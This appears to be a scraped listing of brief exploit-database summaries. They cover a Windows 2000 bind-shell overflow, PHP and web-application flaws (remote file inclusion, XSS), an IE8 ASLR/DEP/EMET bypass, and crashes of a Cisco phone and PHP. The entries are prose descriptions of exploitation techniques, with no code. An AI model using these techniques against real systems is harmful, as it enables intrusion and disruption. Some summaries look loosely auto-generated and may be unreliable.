The exploit spawns a shell on TCP port 4444 and connects to it. At the time of overflow we control EAX which is used in a call as follows 00420C64: call dword ptr [eax + 4]. ECX points into our buffer at the time of overflow. So if we can craft a DWORD that points to an address that translates to call dword ptr [ecx + xx] and have a pointer into our shellcode at that location then our shellcode executes. This exploit uses hardcoded address which worked fine on Windows 2000 server SP4 machines. Credits for discovery and POC goes to Evgeny Legerov.
The Monster Top List <= 1.4.2 is vulnerable to remote command execution. An attacker can exploit this vulnerability by sending a malicious request to the functions.php file, including the path to an evil script. This allows the attacker to execute arbitrary commands on the target system.
Running this will create a file 'j.job'. When explorer.exe or any file-open dialog box accesses the directory containing this file, notepad.exe will be spawned.
This exploit takes advantage of a vulnerability in the hash_update_file() function in PHP. By repeatedly calling the function and freeing the resource, an attacker can cause resource exhaustion and potentially crash the server.
A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149. It only works on Windows although some aspects _might_ work in Mono on *nix.
The PHPFox admin control panel (AdminCP) is vulnerable to a cross-site scripting (XSS) attack. The vulnerability allows an attacker to inject malicious scripts into the user_agent field of the phpfox_log_session table, which is displayed in the AdminCP's Online Guests/Boots page. An attacker with administrative access can exploit this vulnerability to execute arbitrary scripts in the administrative area of the PHPFox website.
This exploit allows for full ASLR, DEP, and EMET 5.1 bypass in Internet Explorer 8.
This exploit targets Mercur v5.00.14 on the Windows platform. It allows an attacker to execute arbitrary code on the target system by sending a specially crafted payload via an NTLM authentication request. The payload is sent in two parts, with the first part being a base64-encoded string and the second part containing various string and byte values. Upon successful exploitation, the attacker gains control over the target system.
After sending a crafted INVITE message, the Cisco 7940 phone reboots immediately. The vulnerability is caused by the phone not properly checking the sipURI field of the Remote-Party-ID in the message.
This code demonstrates a proof of concept for a resource usage exploit in PHP gd. It uses a linux x86 bindshell on port 4444 from Metasploit. The code also includes offsets for the overwrite and a function for error handling.
Services By CQR